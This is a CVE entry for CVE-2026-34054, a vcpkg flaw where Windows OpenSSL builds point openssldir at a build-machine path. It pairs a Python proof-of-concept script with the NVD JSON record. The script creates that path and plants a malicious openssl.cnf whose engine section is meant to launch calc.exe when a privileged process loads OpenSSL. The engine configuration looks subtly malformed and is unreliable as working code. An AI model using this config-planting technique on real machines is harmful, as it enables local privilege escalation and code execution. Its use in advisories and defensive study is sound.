CVE-2026-34054

# CVE-2026-34054 PoC Concept # This script demonstrates the potential exploitation path. # Attackers would create a malicious config at the hardcoded path. import os # The hardcoded path from the build machine (example) # In a real scenario, this path is extracted from the vcpkg binary class VulnerablePath: def __init__(self, path): self.path = path def check_vulnerability(self): # Check if the path exists or is writable if os.path.exists(self.path): print(f"[+] Path exists: {self.path}") else: print(f"[*] Path does not exist, attempting to create: {self.path}") try: os.makedirs(self.path, exist_ok=True) print(f"[+] Successfully created directory structure.") except Exception as e: print(f"[-] Failed to create directory: {e}") return False return True def exploit(self): if self.check_vulnerability(): # Simulate planting a malicious openssl.cnf malicious_config = "openssl_conf = default_conf\n[default_conf]\nengines = engine_section\n[engine_section]\npayload = payload_section\n[payload_section]\nengine_id = malicious\ninit = C:\\windows\\system32\\calc.exe\n" config_path = os.path.join(self.path, "openssl.cnf") try: with open(config_path, "w") as f: f.write(malicious_config) print(f"[+] Successfully planted malicious configuration at {config_path}") print("[*] Wait for a privileged process to load OpenSSL...") except Exception as e: print(f"[-] Failed to write payload: {e}") # Usage # attacker = VulnerablePath("C:\\build-machine-ssl-path") # attacker.exploit()

{"cve": {"id": "CVE-2026-34054", "sourceIdentifier": "[email protected]", "published": "2026-03-31T03:15:58.593", "lastModified": "2026-04-01T14:24:02.583", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "vcpkg is a free and open-source C/C++ package manager. Prior to version 3.6.1#3, vcpkg's Windows builds of OpenSSL set openssldir to a path on the build machine, making that path be attackable later on customer machines. This issue has been patched in version 3.6.1#3."}, {"lang": "es", "value": "vcpkg es un gestor de paquetes C/C++ gratuito y de código abierto. Antes de la versión 3.6.1#3, las compilaciones de OpenSSL para Windows de vcpkg configuraban openssldir a una ruta en la máquina de compilación, haciendo que esa ruta fuera atacable posteriormente en las máquinas de los clientes. Este problema ha sido parcheado en la versión 3.6.1#3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://github.com/microsoft/vcpkg/commit/5111afdf55cc1429d9951e4c7b02010e659346a9", "source": "[email protected]"}, {"url": "https://github.com/microsoft/vcpkg/pull/50518", "source": "[email protected]"}, {"url": "https://github.com/microsoft/vcpkg/security/advisories/GHSA-p322-v6vw-vrq9", "source": "[email protected]"}]}}